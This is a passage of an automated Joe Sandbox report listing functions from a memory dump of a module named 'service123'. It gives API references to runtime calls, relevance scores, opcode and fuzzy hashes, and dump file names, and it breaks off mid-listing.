abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction ID: 139a842071c8ca9e7adc5809f70be0fcccc00545f3e4d1707d55bc53ecd3309c
Opcode Fuzzy Hash: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction Fuzzy Hash: A5C08C349CCB194700003E182090CB9B2E9470722CB8A2D14C08033F00CF02D8198C66

Function 6C34C150 Relevance: 36.3, APIs: 24, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ec701794dc1a44300d3d766ceae0740a6054867044dc9726a326da12ecdaeb7
Instruction ID: c853d425cd0b4c428fd539882f94695e912435f8ceafa24e942259a3bc3eb346
Opcode Fuzzy Hash: 2ec701794dc1a44300d3d766ceae0740a6054867044dc9726a326da12ecdaeb7
Instruction Fuzzy Hash: 80B1A27160C3468FD710DF58D480B9ABBE1BF86308F08896DD9959BB42C375E909CFA2

Function 6C34C470 Relevance: 33.2, APIs: 22, Instructions: 152COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D12
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D17
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D21
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D26
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D30
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D35
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D44
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D4C
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 35326a71aaf71135f7133bc523ec552816d752db028301f517d084259290946b
Instruction ID: 6bdf85e3558594c71db09020273fdd4e5ac203b5450fc3e99e31d4f73d3e29fd
Opcode Fuzzy Hash: 35326a71aaf71135f7133bc523ec552816d752db028301f517d084259290946b
Instruction Fuzzy Hash: 7C41BEB1A012148FCB00DF69D4817E9BBF5BF49348F1884AAD854DF782D33594058F61

Function 6C34D370 Relevance: 31.6, APIs: 21, Instructions: 130sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6C34CD00: strlen.MSVCRT ref: 6C34CD7D

Sleep.KERNEL32 ref: 6C34D4D7
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D21
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D26
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D30
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D35
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D44
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D4C
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort$Sleepstrlen
String ID:
API String ID: 68130653-0
Opcode ID: e008c08fc743d2a9a4f7e1e52b0b6860884138fa90b10ed2d0d4a2a21f63cb1a
Instruction ID: 5d3ffc69677fceee7cbd662a281a3e9c8ae50e0453822080fbb13a37ac8ce792
Opcode Fuzzy Hash: e008c08fc743d2a9a4f7e1e52b0b6860884138fa90b10ed2d0d4a2a21f63cb1a
Instruction Fuzzy Hash: D651B7A020C3C0CAEB11EB3AC04A7657FF56757308F085598C7C84B68BD3BA9509CB7A

Function 6C34D570 Relevance: 28.6, APIs: 19, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 215d3fa62f83e1e35cc25a8928fb47b3980838b6ad99096b84318e7b2fcf8d77
Instruction ID: 932053f67f1e4a02b21e6afb21d80ad15f49a65d24ea45cb3ad48549755bc813
Opcode Fuzzy Hash: 215d3fa62f83e1e35cc25a8928fb47b3980838b6ad99096b84318e7b2fcf8d77
Instruction Fuzzy Hash: ED31B1706093068FE310DF69D880B6AB7E4EBC5358F54C92EE58887B01E739E4548F92

Function 6C34D67C Relevance: 28.5, APIs: 19, Instructions: 32COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D21
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D26
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D30
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D35
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D44
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D4C
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction ID: 4201be484853b1ab5fc57f7f797f670b64614ce2d249690178766e0da4900fac
Opcode Fuzzy Hash: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction Fuzzy Hash: E2B092788997608240106FA40440CB5B2689B03348740AC04418633D010B00E4269866

Function 6C34D6C0 Relevance: 27.1, APIs: 18, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 83ec906835c7ddc813920fbe28aa3b422ee71a5dd15bcc0da1a94adbd330b219
Instruction ID: 60cdc489923e1620f77b1759a19abdb4f1461b8a6f9aecc35cc33faf9774cee5
Opcode Fuzzy Hash: 83ec906835c7ddc813920fbe28aa3b422ee71a5dd15bcc0da1a94adbd330b219
Instruction Fuzzy Hash: 544128B4A093418FE310DF19D580B6ABBE1EB89708F14C92EE598C7B51D375D8448F92

Function 6C34D855 Relevance: 25.5, APIs: 17, Instructions: 45COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D30
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D35
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D44
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D4C
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9f849da23590d4445c74f102737af5eed982f9dac4f16a16a18813bb245a3535
Instruction ID: 972c23aad77b2392c939808150862ae3ff093a1edb948a82c795162e33e1413a
Opcode Fuzzy Hash: 9f849da23590d4445c74f102737af5eed982f9dac4f16a16a18813bb245a3535
Instruction Fuzzy Hash: 0AE0657190C2564BE710EE68D080B757BE1AB4230CF54589CD59527E46C365E46BCF52

Function 6C35C330 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C35C3A1
fwrite.MSVCRT ref: 6C35C448
fputs.MSVCRT ref: 6C35C465
fwrite.MSVCRT ref: 6C35C48E
fputs.MSVCRT ref: 6C35C4AD
fwrite.MSVCRT ref: 6C35C4DC
fwrite.MSVCRT ref: 6C35C50E
abort.MSVCRT ref: 6C35C513
abort.MSVCRT ref: 6C416157
free.MSVCRT ref: 6C41615F

Part of subcall function 6C34A340: strlen.MSVCRT ref: 6C34A3C5
Part of subcall function 6C34A340: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C35C41C), ref: 6C34A3E0
Part of subcall function 6C34A340: free.MSVCRT ref: 6C34A3EA

Strings

terminate called without an active exception, xrefs: 6C35C4D5
-, xrefs: 6C35C4C1
terminate called after throwing an instance of ', xrefs: 6C35C441
not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 6C35C349

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: fwrite$abortfputsfreememcpy$strlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): $terminate called after throwing an instance of '$terminate called without an active exception
API String ID: 4144276882-4175505668
Opcode ID: b0d04e536565a4538c0f2a5d704520e270eba617d35aba526f905dccdb7e965a
Instruction ID: fce4295cc18e797f6ef85bc1fd85c0f2ac9e39c1ec3c89eae27440ae70fbbf59
Opcode Fuzzy Hash: b0d04e536565a4538c0f2a5d704520e270eba617d35aba526f905dccdb7e965a
Instruction Fuzzy Hash: B15106B49083149FD700EF64C489BAABBF4AF85318F00891DE4D987B41D7B99489CF93

Function 6C34D8A8 Relevance: 24.1, APIs: 16, Instructions: 52COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D30
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D35
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C34C5DB), ref: 6C416D44
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D4C
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D51
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D56
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D5B
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D60
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D65
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6A
abort.MSVCRT(?,?,?,?,?,?,6C34E2F4,?,?,?,?,?,?,00000000,00000001,6C35008D), ref: 6C416D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C35038F), ref: 6C416D7E

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f2f64f3e1b5c31b74d2fce0e2cd710e72b4ed2075b906183f2e6cd56ff600c55
Instruction ID: abc30cab441783ee157e9f33a14dfd9236c176c58b919e1bfae373be210365d8
Opcode Fuzzy Hash: f2f64f3e1b5c31b74d2fce0e2cd710e72b4ed2075b906183f2e6cd56ff600c55
Instruction Fuzzy Hash: 55F082F19693454FD310DF28C481B767BA5BB43315F885888D9C41BB42C32994A9DFA1

Function 6C34DE50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

@, xrefs: 6C34DEB8

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen
String ID: @
API String ID: 39653677-2766056989
Opcode ID: ecd4b078ccfc46b9250063bf21c77d29b64aabcc93bb504eecc199d462116ecf
Instruction ID: 0901e5c562985721ae4d4dac0e34d6b210cd3e32486b8b9cb2aab54ca1c6ad16
Opcode Fuzzy Hash: ecd4b078ccfc46b9250063bf21c77d29b64aabcc93bb504eecc199d462116ecf
Instruction Fuzzy Hash: A021C370A0565DCADB20DF50DC80FDD77F8AB86308F1085A6C948ABB00E7319EC88F91

Function 6C34DA90 Relevance: 22.6, APIs: 15, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 732f4fd9dd2c32c0631732822ac3f262aebcb53485fe8e927852cedd78567903
Instruction ID: ad10c02685e5d439edc4dc2faeca88d6fc65bbee5b47308702e18e2603d73dde
Opcode Fuzzy Hash: 732f4fd9dd2c32c0631732822ac3f262aebcb53485fe8e927852cedd78567903
Instruction Fuzzy Hash: 5D412975A042199BCB10DF65C880BDEB7F1AF89318F54C9A9D84AA7701D730AE89CF91

Function 6C34DCE0 Relevance: 21.1, APIs: 14, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
